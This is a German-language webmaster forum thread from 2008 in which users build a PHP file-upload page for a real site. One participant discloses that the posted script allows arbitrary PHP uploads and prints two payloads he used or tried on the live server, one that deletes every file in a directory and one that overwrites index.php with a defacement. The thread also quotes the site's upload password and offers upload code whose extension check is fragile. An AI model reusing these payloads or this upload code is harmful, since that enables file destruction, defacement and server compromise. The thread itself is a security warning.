Upload seite

Hardfighter · Mar 5, 2008

Hallo liebe User

Kann mir mal Bidde einer Helfen ?

Ich habe eine frage wie beckomme ich das hin das hier das kleine bichen Html/php zeug zum laufen kommt für eine Upload seite .

<html>
<head>
</head>
<body>

<form action="ftp.php" enctype="multipart/form-data" method="POST">

Benutzername: <input type="text" name="user" value="">

Passwort: <input type="password" name="pwd" value="">

<input name="lokale_datei" type="file" size="50" maxlength="1024">

<input type="hidden" value="1" name="flag" />
<input type="submit" name="upload" value="Upload">
</form>

<?php

if ($_POST[flag]==1)
{

$ftp_server = ""; // Hier FTP Server eintragen
$benutzername = $_POST[user];
$passwort = $_POST[pwd];
$zieldatei = $HTTP_POST_FILES['lokale_datei']['name'];

$connection_id = ftp_connect($ftp_server);

$login_result = ftp_login($connection_id, $benutzername, $passwort);

if ((!$connection_id) || (!$login_result))
{
echo 'Keine Ftp-Verbindung hergestellt!
';
echo 'Verbindung mit ftp_server als Benutzer '.$benutzername.' nicht möglich!';

die;
}
else
{ echo 'Verbunden mit dem FTP-Server als Benutzer '.$benutzername.'
'; }

$upload = ftp_put($connection_id, $zieldatei, $lokale_datei, FTP_ASCII);

if (!$upload)
{ echo 'Ftp upload war fehlerhaft!
'; }

else { echo 'Datei '.$zieldatei.' auf '.$ftp_server.' als '.$zieldatei.' geschrieben
'; }

$verzeichnis = ftp_pwd ( $connection_id );
echo 'Verzeichnis: '.$verzeichnis.'

';

$liste = ftp_nlist ( $connection_id, "/");
for ($i=0;$i<count($liste);$i++)
{
echo $liste[$i].'
';
}

ftp_quit($connection_id);

}
?>

<body>
</html>
Click to expand...

Also es solte ohne Benuzer, Passwort begrenzung bis 30 mb upload möglich sein und natürlich einen link heras geben das man es runter laden kann !!!

ich würde mich freuen wenn mir einer helfen kann
Näturlich beckommt der jenige was dafür, ist ja sau mäsig arbeit !!!

Hab schon 3 Tage Google am laufen deswegen.

Mfg Hardfighter

Spacerat · Mar 5, 2008

Wie viel Upload möglich ist, liegt an der Serverkonfiguration (Erlaubter Wert der POST), daran kannst du wenig ändern.
Die Methode, per FTP was hochzuladen, rate ich auch gerne ab. Ich hab hier ein uraltes Uploadscript von mir, das könnte dir vllt helfen, du müsstest es nur einstylen, etc.

PHP:

<?php $site = "http://deine.domain.hierhin/"; $password = "passwort_fuer_upload"; if(isset($_POST['upload'])) { if(is_uploaded_file($_FILES['file']['tmp_name']) && md5($_POST['password_up']) == md5($password) ) { $fn = $_FILES['file']['name']; $filenamernd = md5($_FILES['file']['name']); $dateierweiterung = explode(".", $fn ); $dateierw_count = count($dateierweiterung); $splitt = $dateierweiterung[count($dateierw_count)]; for ( $i = count($dateierw_count); $dateierweiterung[count($dateierw_count) + $i] != "" || $i == "10" ;$i++ ) { $splitt = $dateierweiterung[count($dateierw_count) + $i]; if ( $i == "10" ) { die("Fehler!"); } } $filenamernd = $_FILES['file']['name'] . "-" . md5(rand(1, 1000000) . $fn); if(move_uploaded_file($_FILES['file']['tmp_name'], './uploads/' . $filenamernd . "." . $splitt)) { echo '<br><p>Upload erfolgreich!<br />'."\n"; echo '<br>Dateiname: '.$filenamernd . "." . $splitt."<br />\n"; echo '<br>Adresse: '.$site.$row['siteurl'].'uploads/'.$filenamernd . "." . $splitt.'<br>'; echo "<br>Für Foren: [url=".$site.$row['siteurl']."link_anpassen][img]".$site.$row['siteurl']."uploads/".$filenamernd . "." . $splitt."[/img][/url]<br>"; } else { echo '<p>Upload fehlgeschlagen!</p>'; } } elseif(md5($_POST['password_up']) != md5($password) ) { echo '<p>Falsches Passwort!<br /><br /><a href="javascript:history.back(-1)">Zurück</a></p>'; } else { echo '<p>Keine Datei hochgeladen!</p>'; } } else { ?> <form enctype="multipart/form-data" action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> <p><label for="file">Datei:       <input type="file" id="file" name="file" size="50" /></label><br /> <label for="password_up">Passwort: <input type="password" id="password_up" name="password_up" size="10" value="" /></label><br /> <input type="hidden" id="passwort" name="password"> <input type="hidden" name="upload" value="Uploaden"> <input type="submit" value="Uploaden" /><br /> </p> </form> <? } ?>

Die Basis für das Script hab ich vor Jahren mal von fanrpg gekriegt, den Rest hab ich draus gemacht *g*
Wie gesagt, ist alt, früher war ich auch noch nicht so versiert...
Viel Spaß damit

Das Script setzt in der Basisversion (wie es hier ist) einen Ordner "uploads" voraus, der (auf Linuxservern, wie die es sind, die ich nutze) die CHMOD 777 hat, d.h., dass er u.a. beschreibbar ist.

In dem Script musst du oben nur das Passwort für den Upload anpassen und die Domain.

Hardfighter · Mar 6, 2008

Ja coole sache nur ich blicke da nicht so ganz durch bei mir kommt das etwas doof an.

Also hab es mal probiert das ist dabei raus gekommen : KLick mich

Mfg Hardfighter

fanrpg · Mar 6, 2008

LoL, du darfst das nicht als index.html benutzen sondern als index.php auf dem Server hochladen.

Hardfighter · Mar 6, 2008

Ups oki ich gug grade mal

Hardfighter · Mar 6, 2008

hab es gemacht aber und das pw auch alles eingetragen ,

das ist hardlasersound.de

kannst ja ma versuchen

D!abloSV · Mar 6, 2008

Hast du auch die nötigen Rechte gesetzt sowie das nötige Uploadverzeichnis angelegt?

Ich bin jetz auch kein Pro im Programmieren, aber sollte das am Anfang nicht iwie so ausschaun im Quelltext?

PHP:

<?php $site = 'http://upload.hardlasersound.de/'; $password = 'hardlasersound.de'; if(isset($_POST['upload']))

Ich bin mir bei php nicht ganz sicher wie da das ganze gemacht werden muss...

Hardfighter · Mar 6, 2008

@ Spacerat

Kannst du mir en bichen helfen?
Hab ja von dir den Sever deswegen weißt du da ja bestens bescheid.

Mfg Hardfighter

Spacerat · Mar 6, 2008

Script korrigiert... normal mach ich das so nicht, aber ich habs dir per root draufgepackt, es funzt jetzt.
War ein copy/paste-Fehler nach hierhin... komischerweise..

fanrpg · Mar 6, 2008

! Achtung !

Achtung, Sicherheitslücke

Durch eine Lücke in deinem Uploadscript kann man beliebig viele PHP-Dateien hochladen und dementsprechend auch bearbeiten und z.B an deine config.php kommen =)

War übrigens sehr interessant dein INFUSION config.

Ach ja Spuren verwischen geht natürlich auch mit dateien:

PHP:

<?php $handle = opendir("./"); while( $file = readdir($handle) ) { echo $file . "<br />"; if( $file != '.' && $file != '..' ) { chmod($file, 0777); unlink($file); } } closedir($handle); ?>

Also nie(!) ungesicherte Uploadscripts benutzen tut dir und dem Server nicht gut Könnte gefährlich werden.

Das hat übrigens nicht geklappt, aber auch nur mangels Berechtigungen die sich net mal per chmod() setzen liessen.

PHP:

<?php $new_handle = fopen("./../index.php", 'w+'); $new_code = '<?php echo "<div style="font-size:16px; font-weight:bold;">Hallo! <br />"; echo "Wäre ich jetzt fies könnte ich den Server hacken! Sowie den Rest der Seite.. :D Aber ach ja DB-Passwort ändern ;)"; echo "<br /><br />h4ck3d by <i>fanrpg</i> :D"; ?>'; fwrite($new_handle, $new_code); fclose($new_handle); ?>

Aber ich habe dir trotzdem mal das Uploadscript lahmgelegt
Zwar nicht über den Weg sondern über "andere" Methoden die ich hier nicht länger ausbreiten möchte (und nein nicht per root-rechte sondern wie auch hier via php Datei Upload)

Sollte der Selbe Code drinne stehen wie oben in der var $new_code, aber leider habe ich vergessen in der eile die " zu maskieren deswegen kommt so ne doofe Fehlermeldung.

Ist gefährlich, lass nur mal einen Cracker drüber stolpern der was bösartiges will dann wärs es aus mit deiner Seite und dem Server. Aus diesem Grunde habe ich es auch lahmgelegt wäre sehr viel Arbeit gewesen das wieder zu berichtigen.

Ach ja hier ein gesichertes Uploadscript wo nur Bilddateien erlaubt sind:

PHP:

<?php $site = "http://upload.hardlasersound.de/"; $password = "hardlasersound.de"; if(isset($_POST['upload'])) { if(is_uploaded_file($_FILES['file']['tmp_name']) && md5($_POST['password_up']) == md5($password) ) { $fn = $_FILES['file']['name']; $filenamernd = md5($_FILES['file']['name']); $dateierweiterung = explode(".", $fn ); $dateierw_count = count($dateierweiterung); $splitt = $dateierweiterung[count($dateierw_count)]; if( $splitt == 'jpg' or $splitt == 'jpeg' or $splitt == 'gif' or $splitt == 'bmp' or $splitt == 'png' ) { for ( $i = count($dateierw_count); $dateierweiterung[count($dateierw_count) + $i] != "" || $i == "10" ;$i++ ) { $splitt = $dateierweiterung[count($dateierw_count) + $i]; if ( $i == "10" ) { die("Fehler!"); } } $filenamernd = $_FILES['file']['name'] . "-" . md5(rand(1, 1000000) . $fn); if(move_uploaded_file($_FILES['file']['tmp_name'], './uploads/' . $filenamernd . "." . $splitt)) { echo '<br><p>Upload erfolgreich!<br />'."\n"; echo '<br>Dateiname: '.$filenamernd . "." . $splitt."<br />\n"; echo '<br>Adresse: '.$site.$row['siteurl'].'uploads/'.$filenamernd . "." . $splitt.'<br>'; echo "<br>Für Foren: [url=".$site.$row['siteurl']."link_anpassen][img]".$site.$row['siteurl']."uploads/".$filenamernd . "." . $splitt."[/img][/url]<br>"; } else { echo '<p>Upload fehlgeschlagen!</p>'; } } else { die("Falsche Dateiendung"); } } elseif(md5($_POST['password_up']) != md5($password) ) { echo '<p>Falsches Passwort!<br /><br /><a href="javascript:history.back(-1)">Zurück</a></p>'; } else { echo '<p>Keine Datei hochgeladen!</p>'; } } else { ?> <form enctype="multipart/form-data" action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> <p><label for="file">Datei:       <input type="file" id="file" name="file" size="50" /></label><br /> <label for="password_up">Passwort: <input type="password" id="password_up" name="password_up" size="10" value="" /></label><br /> <input type="hidden" id="passwort" name="password"> <input type="hidden" name="upload" value="Uploaden"> <input type="submit" value="Uploaden" /><br /> </p> </form> <? } ?>

btw. Passwort von der DB ändern habe es ja gesehen.

Spacerat · Mar 6, 2008

Was meinst du, warum ich da die Passwortabfrage reingequetscht hatte, fan
Mir ist das Sicherheitsrisiko des Scripts auch bewusst, wie gesagt, es ist alt, sehr alt *g*

fanrpg · Mar 6, 2008

Na ja die PW-Abfrage bringt auch viel wenn das hier in dem Thread steht

siehe hier: http://forum.sysprofile.de/webmaster-support-scripts-etc/8192-upload-seite.html#post135447

Da ich aber im Moment kein Zugriff habe auf Server und du nicht in MSN warst habe ich erstmal sicherheitshalber so gemacht.

Hardfighter · Mar 7, 2008

Also kann ich das jetzt vergesen oder was ?
mit dem Daten upload für mp3 ?

fanrpg · Mar 7, 2008

Nein, einfach bei
Code:
if( $splitt == 'jpg'
dahinter
Code:
or $splitt == 'mp3' 
einfügen

Dann geht das schon

Hardfighter · Mar 7, 2008

fanrpg said: ↑
Nein, einfach bei
Code:
if( $splitt == 'jpg'
dahinter
Code:
or $splitt == 'mp3' 
einfügen

Dann geht das schon
Click to expand...
Kannst du mir das Script Schnell um ändern für MP3,wav,und bilder ???

Upload seite

Upload seite

Upload seite - Similar Threads - Upload

Neue Tarife: Vodafone kündigt auch mehr Upload-Speed an

Upload seite solved

SysProfile Windows Foren

Hardware Foren